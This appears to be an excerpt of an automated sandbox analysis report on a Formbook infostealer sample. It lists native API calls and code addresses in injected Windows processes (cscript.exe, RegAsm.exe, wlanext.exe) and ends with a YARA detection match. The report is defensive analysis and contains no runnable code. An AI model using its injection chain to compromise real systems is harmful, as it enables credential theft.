          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D98F0 NtReadVirtualMemory,10_2_047D98F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D98A0 NtWriteVirtualMemory,10_2_047D98A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9950 NtQueueApcThread,10_2_047D9950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D99D0 NtCreateProcessEx,10_2_047D99D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D99A0 NtCreateSection,10_2_047D99A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A50 NtCreateFile,10_2_047D9A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A20 NtResumeThread,10_2_047D9A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A10 NtQuerySection,10_2_047D9A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A00 NtProtectVirtualMemory,10_2_047D9A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A80 NtOpenDirectoryObject,10_2_047D9A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9B00 NtSetValueKey,10_2_047D9B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA3B0 NtGetContextThread,10_2_047DA3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029782B0 NtClose,10_2_029782B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978230 NtReadFile,10_2_02978230
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978360 NtAllocateVirtualMemory,10_2_02978360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978180 NtCreateFile,10_2_02978180
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029782AA NtClose,10_2_029782AA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297822A NtReadFile,10_2_0297822A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297835E NtAllocateVirtualMemory,10_2_0297835E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B99F2_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CB272_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C2C2_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C302_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C53B2_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BD882_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2B282_2_030E2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AB402_2_0303AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304EBB02_2_0304EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D03DA2_2_030D03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DDBD22_2_030DDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CFA2B2_2_030CFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E22AE2_2_030E22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301F9002_2_0301F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030341202_2_03034120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D10022_2_030D1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EE8242_2_030EE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302B0902_2_0302B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030420A02_2_030420A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E20A82_2_030E20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E28EC2_2_030E28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030EDFCE2_2_030EDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1FF12_2_030E1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD6162_2_030DD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03036E302_2_03036E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2EF72_2_030E2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E2D072_2_030E2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03010D202_2_03010D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E1D552_2_030E1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030425812_2_03042581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E25DD2_2_030E25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302D5E02_2_0302D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302841F2_2_0302841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DD4662_2_030DD466
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6FF884_2_00B6FF88
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_00B6F37F4_2_00B6F37F
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04E14_2_02CC04E1
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_02CC04F04_2_02CC04F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B99F5_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041CB275_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C2C5_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408C305_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041C53B5_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041BD885_2_0041BD88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF5_2_02FB4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC22AE5_2_02FC22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B2365_2_02F1B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAFA2B5_2_02FAFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FA23E35_2_02FA23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB03DA5_2_02FB03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBDBD25_2_02FBDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2ABD85_2_02F2ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2EBB05_2_02F2EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2138B5_2_02F2138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1AB405_2_02F1AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F9CB4F5_2_02F9CB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2B285_2_02FC2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A3095_2_02F1A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC28EC5_2_02FC28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F220A05_2_02F220A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC20A85_2_02FC20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0B0905_2_02F0B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A8305_2_02F1A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FCE8245_2_02FCE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB10025_2_02FB1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F199BF5_2_02F199BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F141205_2_02F14120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EFF9005_2_02EFF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2EF75_2_02FC2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F16E305_2_02F16E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBD6165_2_02FBD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC1FF15_2_02FC1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FCDFCE5_2_02FCDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB44965_2_02FB4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B4775_2_02F1B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBD4665_2_02FBD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0841F5_2_02F0841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0D5E05_2_02F0D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC25DD5_2_02FC25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F225815_2_02F22581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB2D825_2_02FB2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC1D555_2_02FC1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF0D205_2_02EF0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC2D075_2_02FC2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373AB406_2_0373AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037BCB4F6_2_037BCB4F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2B286_2_037E2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373A3096_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037C23E36_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D03DA6_2_037D03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374ABD86_2_0374ABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DDBD26_2_037DDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374EBB06_2_0374EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0374138B6_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373B2366_2_0373B236
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037CFA2B6_2_037CFA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D4AEF6_2_037D4AEF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E22AE6_2_037E22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037341206_2_03734120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0371F9006_2_0371F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037399BF6_2_037399BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373A8306_2_0373A830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037EE8246_2_037EE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D10026_2_037D1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E28EC6_2_037E28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037420A06_2_037420A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E20A86_2_037E20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372B0906_2_0372B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E1FF16_2_037E1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037EDFCE6_2_037EDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03736E306_2_03736E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DD6166_2_037DD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2EF76_2_037E2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E1D556_2_037E1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03710D206_2_03710D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E2D076_2_037E2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372D5E06_2_0372D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037E25DD6_2_037E25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037425816_2_03742581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D2D826_2_037D2D82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0373B4776_2_0373B477
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037DD4666_2_037DD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0372841F6_2_0372841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037D44966_2_037D4496
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325CB276_2_0325CB27
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B9546_2_0325B954
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325B9986_2_0325B998
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242FB06_2_03242FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325C53B6_2_0325C53B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242D886_2_03242D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325BD886_2_0325BD88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03242D906_2_03242D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03248C2C6_2_03248C2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03248C306_2_03248C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BB47710_2_047BB477
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485449610_2_04854496
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047A841F10_2_047A841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485D46610_2_0485D466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04852D8210_2_04852D82
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04790D2010_2_04790D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048625DD10_2_048625DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862D0710_2_04862D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047AD5E010_2_047AD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04861D5510_2_04861D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C258110_2_047C2581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04841EB610_2_04841EB6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6E3010_2_047B6E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862EF710_2_04862EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B560010_2_047B5600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485D61610_2_0485D616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486DFCE10_2_0486DFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04861FF110_2_04861FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048620A810_2_048620A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA83010_2_047BA830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048628EC10_2_048628EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485100210_2_04851002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486E82410_2_0486E824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C20A010_2_047C20A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047AB09010_2_047AB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B412010_2_047B4120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0479F90010_2_0479F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B99BF10_2_047B99BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048622AE10_2_048622AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BB23610_2_047BB236
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04854AEF10_2_04854AEF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0484FA2B10_2_0484FA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BAB4010_2_047BAB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0485DBD210_2_0485DBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048503DA10_2_048503DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048423E310_2_048423E3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA30910_2_047BA309
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CABD810_2_047CABD8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04862B2810_2_04862B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CEBB010_2_047CEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483CB4F10_2_0483CB4F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BEB9A10_2_047BEB9A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C138B10_2_047C138B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297CB2710_2_0297CB27
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297B99810_2_0297B998
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297B95410_2_0297B954
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962FB010_2_02962FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02968C3010_2_02968C30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02968C2C10_2_02968C2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962D9010_2_02962D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02962D8810_2_02962D88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297BD8810_2_0297BD88
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297C53B10_2_0297C53B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0371B150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02EFB150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0301B150 appears 48 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00419F30 appears 42 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041A060 appears 50 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0479B150 appears 145 times
          Source: NQQWym075C.exe, 00000004.00000002.498473507.0000000005F80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenbqzOvmZAbSHtViT.bounce.exe4 vs NQQWym075C.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signato